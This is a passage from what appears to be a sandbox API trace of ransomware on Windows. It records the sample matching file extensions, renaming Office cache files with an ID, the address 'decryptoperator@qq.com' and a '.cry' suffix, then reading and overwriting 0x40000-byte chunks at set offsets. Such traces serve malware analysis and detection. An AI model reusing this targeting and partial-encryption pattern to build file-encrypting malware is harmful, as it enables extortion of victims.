(lpString=".zip") returned 4 [0048.808] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString=".rar") returned 4 [0048.808] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString=".bz2") returned 4 [0048.808] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.808] lstrlenW (lpString=".7z") returned 3 [0048.808] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW (lpString=".dbf") returned 4 [0048.808] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW (lpString=".1cd") returned 4 [0048.808] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW (lpString=".jpg") returned 4 [0048.808] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW (lpString=".doc") returned 4 [0048.808] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString=".docx") returned 5 [0048.808] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0048.808] lstrlenW (lpString=".pdf") returned 4 [0048.808] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString=".xls") returned 4 [0048.808] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString=".xlsx") returned 5 [0048.808] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0048.808] lstrlenW (lpString=".ppt") returned 4 [0048.808] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW (lpString=".zip") returned 4 [0048.808] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.809] lstrlenW (lpString=".rar") returned 4 [0048.809] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.809] lstrlenW (lpString=".bz2") returned 4 [0048.809] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.809] lstrlenW (lpString=".7z") returned 3 [0048.809] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.809] lstrlenW (lpString=".dbf") returned 4 [0048.809] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.809] lstrlenW (lpString=".1cd") returned 4 [0048.809] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.809] lstrlenW (lpString=".jpg") returned 4 [0048.809] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.809] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0048.809] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0048.809] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.992] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=36233052) returned 1 [0048.992] CloseHandle (hObject=0x21c) returned 1 [0048.992] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0048.992] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.992] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0048.993] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.993] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.993] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.993] ReadFile (in: hFile=0x21c, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.357] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.357] ReadFile (in: hFile=0x21c, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.378] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.379] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.379] ReadFile (in: hFile=0x21c, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.446] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.446] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0049.465] SetEndOfFile (hFile=0x21c) returned 1 [0049.632] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0049.640] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.641] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.641] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.641] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.642] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.642] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.644] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0049.644] CloseHandle (hObject=0x21c) returned 1 [0049.644] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0049.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.644] lstrlenW (lpString=".doc") returned 4 [0049.644] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0049.644] lstrlenW (lpString=".docx") returned 5 [0049.644] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0049.645] lstrlenW (lpString=".pdf") returned 4 [0049.645] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".xls") returned 4 [0049.645] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".xlsx") returned 5 [0049.645] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0049.645] lstrlenW (lpString=".ppt") returned 4 [0049.645] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.645] lstrlenW (lpString=".zip") returned 4 [0049.645] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".rar") returned 4 [0049.645] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".bz2") returned 4 [0049.645] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0049.645] lstrlenW (lpString=".7z") returned 3 [0049.645] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0049.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.645] lstrlenW (lpString=".dbf") returned 4 [0049.645] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.645] lstrlenW (lpString=".1cd") returned 4 [0049.645] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0049.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.645] lstrlenW (lpString=".jpg") returned 4 [0049.645] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.645] lstrlenW (lpString=".doc") returned 4 [0049.645] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".docx") returned 5 [0049.645] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0049.645] lstrlenW (lpString=".pdf") returned 4 [0049.645] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".xls") returned 4 [0049.645] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0049.645] lstrlenW (lpString=".xlsx") returned 5 [0049.646] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0049.646] lstrlenW (lpString=".ppt") returned 4 [0049.646] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0049.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.646] lstrlenW (lpString=".zip") returned 4 [0049.646] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0049.646] lstrlenW (lpString=".rar") returned 4 [0049.646] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0049.646] lstrlenW (lpString=".bz2") returned 4 [0049.646] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0049.646] lstrlenW (lpString=".7z") returned 3 [0049.646] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0049.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.646] lstrlenW (lpString=".dbf") returned 4 [0049.646] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0049.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.646] lstrlenW (lpString=".1cd") returned 4 [0049.646] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0049.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0049.646] lstrlenW (lpString=".jpg") returned 4 [0049.646] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0049.646] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0049.646] lstrlenW (lpString="PrjPrrWW.cab") returned 12 [0049.646] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0049.646] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=162970271) returned 1 [0049.646] CloseHandle (hObject=0x21c) returned 1 [0049.647] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020 [0049.647] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.647] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0049.647] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0049.647] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0049.647] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.647] ReadFile (in: hFile=0x21c, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.719] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.719] ReadFile (in: hFile=0x21c, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.762] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.762] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.763] ReadFile (in: hFile=0x21c, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.821] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.821] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0049.840] SetEndOfFile (hFile=0x21c) returned 1 [0049.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0049.844] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.844] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.844] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.844] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.847] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.847] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.849] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0049.849] CloseHandle (hObject=0x21c) returned 1 [0049.849] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0049.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.849] lstrlenW (lpString=".doc") returned 4 [0049.849] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0049.849] lstrlenW (lpString=".docx") returned 5 [0049.849] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0049.849] lstrlenW (lpString=".pdf") returned 4 [0049.849] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0049.850] lstrlenW (lpString=".xls") returned 4 [0049.850] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0049.850] lstrlenW (lpString=".xlsx") returned 5 [0049.850] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0049.850] lstrlenW (lpString=".ppt") returned 4 [0049.850] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0049.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.850] lstrlenW (lpString=".zip") returned 4 [0049.850] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0049.850] lstrlenW (lpString=".rar") returned 4 [0049.888] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString=".bz2") returned 4 [0049.888] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0049.888] lstrlenW (lpString=".7z") returned 3 [0049.888] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0049.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.888] lstrlenW (lpString=".dbf") returned 4 [0049.888] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.888] lstrlenW (lpString=".1cd") returned 4 [0049.888] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0049.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.888] lstrlenW (lpString=".jpg") returned 4 [0049.888] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.888] lstrlenW (lpString=".doc") returned 4 [0049.888] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString=".docx") returned 5 [0049.888] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0049.888] lstrlenW (lpString=".pdf") returned 4 [0049.888] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString=".xls") returned 4 [0049.888] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString=".xlsx") returned 5 [0049.888] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0049.888] lstrlenW (lpString=".ppt") returned 4 [0049.888] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.888] lstrlenW (lpString=".zip") returned 4 [0049.888] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString=".rar") returned 4 [0049.888] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0049.888] lstrlenW (lpString=".bz2") returned 4 [0049.888] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0049.888] lstrlenW (lpString=".7z") returned 3 [0049.888] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0049.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.889] lstrlenW (lpString=".dbf") returned 4 [0049.889] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0049.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.889] lstrlenW (lpString=".1cd") returned 4 [0049.889] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0049.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0049.889] lstrlenW (lpString=".jpg") returned 4 [0049.889] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0049.889] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0049.889] lstrlenW (lpString="Office32WW.msi") returned 14 [0049.889] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.325] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1992192) returned 1 [0050.325] CloseHandle (hObject=0x1c4) returned 1 [0050.325] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0050.325] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.325] MoveFileW (lpExistingFileName="C:\\MSOCache\\All 